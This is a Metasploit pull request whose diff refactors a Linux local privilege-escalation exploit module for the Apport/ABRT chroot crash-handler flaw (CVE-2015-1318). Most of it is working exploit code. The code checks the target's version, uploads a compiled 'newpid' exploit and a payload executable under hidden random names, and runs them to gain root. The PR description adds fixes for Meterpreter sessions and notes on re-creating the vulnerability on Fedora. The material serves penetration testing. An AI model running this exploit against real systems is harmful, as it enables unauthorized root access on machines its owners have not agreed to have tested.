### PR TITLE
Cleanup apport_abrt_chroot_priv_esc

### DIFF
--- a/modules/exploits/linux/local/apport_abrt_chroot_priv_esc.rb
+++ b/modules/exploits/linux/local/apport_abrt_chroot_priv_esc.rb
@@ -7,6 +7,9 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
@@ -20,12 +23,12 @@ class MetasploitModule < Msf::Exploit::Local
         Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are
         vulnerable, due to a feature which allows forwarding reports to
         a container's Apport by changing the root directory before loading
-        the crash report, causing 'usr/share/apport/apport' within the crashed
+        the crash report, causing `usr/share/apport/apport` within the crashed
         task's directory to be executed.
 
         Similarly, Fedora is vulnerable when the kernel crash handler is
         configured to change root directory before executing ABRT, causing
-        'usr/libexec/abrt-hook-ccpp' within the crashed task's directory to be
+        `usr/libexec/abrt-hook-ccpp` within the crashed task's directory to be
         executed.
 
         In both instances, the crash handler does not drop privileges,
@@ -75,16 +78,21 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    kernel_version = Gem::Version.new cmd_exec('uname -r').split('-').first
-
-    if kernel_version < Gem::Version.new('3.12')
-      vprint_error "Linux kernel version #{kernel_version} is NOT vulnerable"
+    unless userns_enabled?
+      vprint_error 'Unprivileged user namespaces are not permitted'
       return CheckCode::Safe
     end
+    vprint_good 'Unprivileged user namespaces are permitted'
 
+    kernel_version = Gem::Version.new kernel_release.split('-').first
+
+    if kernel_version < Gem::Version.new('3.12')
+      vprint_error "Linux kernel version #{kernel_version} is not vulnerable"
+      return CheckCode::Safe
+    end
     vprint_good "Linux kernel version #{kernel_version} is vulnerable"
 
-    kernel_core_pattern = cmd_exec 'cat /proc/sys/kernel/core_pattern'
+    kernel_core_pattern = read_file('/proc/sys/kernel/core_pattern').to_s
 
     # Vulnerable core_pattern (abrt):
     #   kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e
@@ -92,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Local
     #   kernel.core_pattern = |/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e
     if kernel_core_pattern.include?('chroot') && kernel_core_pattern.include?('abrt-hook-ccpp')
       vprint_good 'System is configured to chroot ABRT for crash reporting'
-      return CheckCode::Vulnerable
+      return CheckCode::Appears
     end
 
     # Vulnerable core_pattern (apport):
@@ -103,23 +111,24 @@ class MetasploitModule < Msf::Exploit::Local
       res = cmd_exec 'apport-cli --version'
 
       if res.blank?
-        vprint_error 'Apport is NOT installed'
+        vprint_error 'Apport is not installed'
         return CheckCode::Safe
       end
 
       apport_version = Gem::Version.new(res.split('-').first)
 
-      if apport_version >= Gem::Version.new('2.13') && apport_version < Gem::Version.new('2.17.1')
+      # apport 2.13 < 2.17.1
+      if apport_version.between?(Gem::Version.new('2.13'), Gem::Version.new('2.17'))
         vprint_good "Apport version #{apport_version} is vulnerable"
-        return CheckCode::Vulnerable
+        return CheckCode::Appears
       end
 
-      vprint_error "Apport version #{apport_version} is NOT vulnerable"
+      vprint_error "Apport version #{apport_version} is not vulnerable"
 
       return CheckCode::Safe
     end
 
-    vprint_error 'System is NOT configured to use Apport or chroot ABRT for crash reporting'
+    vprint_error 'System is not configured to use Apport or chroot ABRT for crash reporting'
 
     CheckCode::Safe
   end
@@ -128,30 +137,31 @@ class MetasploitModule < Msf::Exploit::Local
     print_status "Writing '#{path}' (#{data.size} bytes) ..."
     rm_f path
     write_file path, data
-    cmd_exec "chmod +x '#{path}'"
+    chmod path
     register_file_for_cleanup path
   end
 
   def exploit
-    if check != CheckCode::Vulnerable
+    if check != CheckCode::Appears
       fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
     end
 
     # Upload Tavis Ormandy's newpid exploit:
     # - https://www.exploit-db.com/exploits/36746/
     # Cross-compiled with:
     # - i486-linux-musl-cc -static newpid.c
-    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-1318', 'newpid'
-    fd = ::File.open path, 'rb'
-    executable_data = fd.read fd.stat.size
-    fd.close
+    executable_data = ::File.binread ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-1318', 'newpid'
 
-    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    executable_name = ".#{rand_text_alphanumeric 5..10}"
     executable_path = "#{base_dir}/#{executable_name}"
     upload_and_chmodx executable_path, executable_data
 
     # Upload payload executable
-    payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    payload_name = ".#{rand_text_alphanumeric 5..10}"
     payload_path = "#{base_dir}/#{payload_name}"
     upload_and_chmodx payload_path, generate_payload_exe
 
@@ -161,24 +171,8 @@ class MetasploitModule < Msf::Exploit::Local
 
     # Change working directory to base_dir,
     # allowing newpid to create the required hard links
-    cmd_exec "cd '#{base_dir}'"
-
     print_status 'Launching exploit...'
-    output = cmd_exec executable_path
+    output = cmd_exec "cd #{base_dir}; echo '#{payload_path}&' | #{executable_path}"
     output.each_line { |line| vprint_status line.chomp }
-
-    # Check for root privileges
-    id = cmd_exec 'id'
-
-    unless id.include? 'root'
-      fail_with Failure::Unknown, 'Failed to gain root privileges'
-    end
-
-    print_good 'Upgraded session to root privileges'
-    vprint_line id
-
-    # Execute payload executable
-    vprint_status 'Executing payload...'
-    cmd_exec payload_path
   end
 end


### PR DESCRIPTION
Updates the `apport_abrt_chroot_priv_esc` module to be more in-line with current Linux LPE modules through code style changes and using new libs.

Also fixes a few issues when using the module on Meterpreter sessions:

* The module made use of `cd`, which won't work on Meterpreter sessions, causing hard linking to fail, causing the exploit to fail. Using `cd` also results in the `exploit` directory generated by the exploit to appear in the working directory, not the intended directory, resulting in the directory not being cleaned up after a failed exploitation attempt.
* The module upgraded the session in a new process (sub-shell) prior to executing the payload. This implementation works for command shell sessions, but was unsafe for Meterpreter sessions, and would cause the exploit to fail.

Note, it should work on Ubuntu 14.04.1 out of the box; but if you're testing on Fedora 19/20/21, you'll likely need to reintroduce the vulnerability as per https://github.com/rapid7/metasploit-framework/pull/9399#issuecomment-362147292 https://github.com/rapid7/metasploit-framework/pull/9399#issuecomment-362150591 (although disabling SELinux should not be necessary) - unless you feel like attempting to cherry pick the appropriate packages.
